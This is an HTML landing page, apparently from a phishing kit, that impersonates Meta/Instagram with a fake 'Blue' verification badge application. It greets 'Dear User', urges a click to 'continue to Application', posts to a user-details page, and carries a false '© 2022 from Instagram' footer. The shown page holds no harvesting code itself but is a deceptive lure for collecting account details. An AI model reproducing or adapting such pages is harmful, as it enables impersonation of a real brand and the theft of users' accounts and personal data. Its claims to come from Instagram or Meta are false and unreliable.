<!DOCTYPE html>
<html lang="en">

<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <title>Blue | Application Meta</title>
        <meta name="description" content="">
        <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="icon" href="assets/img/head.ico">
    <link href="assets/bootstrap/css/bootstrap.min.css" rel="stylesheet">
    <link href="assets/zew/css/style.css" rel="stylesheet">
    <link rel="stylesheet" href="../use.fontawesome.com/releases/v5.12.1/css/all.html" crossorigin="anonymous">
</head>

<body>


<header>
		<table>
			<tr>
				<td><img src="img/logo.png" width="200"></td>
				<td><font size="5"><i class="fas fa-stream"></i></font></td>
			</tr>
		</table>
	</header>
        <div class="lsf_o">
<div class="cardd">
<center>
    <img src="img/meta.png" width="300">
</center><br>
<center>
    <h1 style="font-family:sans-serif; font-weight:400;  color:#3d3d3d; font-size:20px;">
        Approval | Tick Form
    
    </h1>
<br><br>

    <h5 style="font-family:sans-serif; color:#999; width: 80%;">
    Hello Dear User, You have been directed to this page for Badge Application, Please continue by clicking the button.
</h5>
<h5 style="font-family:sans-serif; color:#999; width: 80%; margin-top: 20px;">
Click the Button Below and Continue to Application
</h5>

        <form method="POST" action="user-details/user-details.html">

            <button type="submit" class="bvsf_asd">
                <span>Next
                </span>
            </button><br>
            <img src="img/meta.gif" width="300px">
</form>

    </center>

<script src='../cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.html'></script>
<script src='../cdnjs.cloudflare.com/ajax/libs/jquery-easing/1.3/jquery.easing.min.html'></script>

<script src="assets/bootstrap/js/bootstrap.min.js"></script>
<script src="assets/zew/js/zewform.js"></script>
<br><br><br><br>
<div class="footer">
  <p>© 2022 from Instagram</p>
</div>
</div>
</div>
</body>

</html>
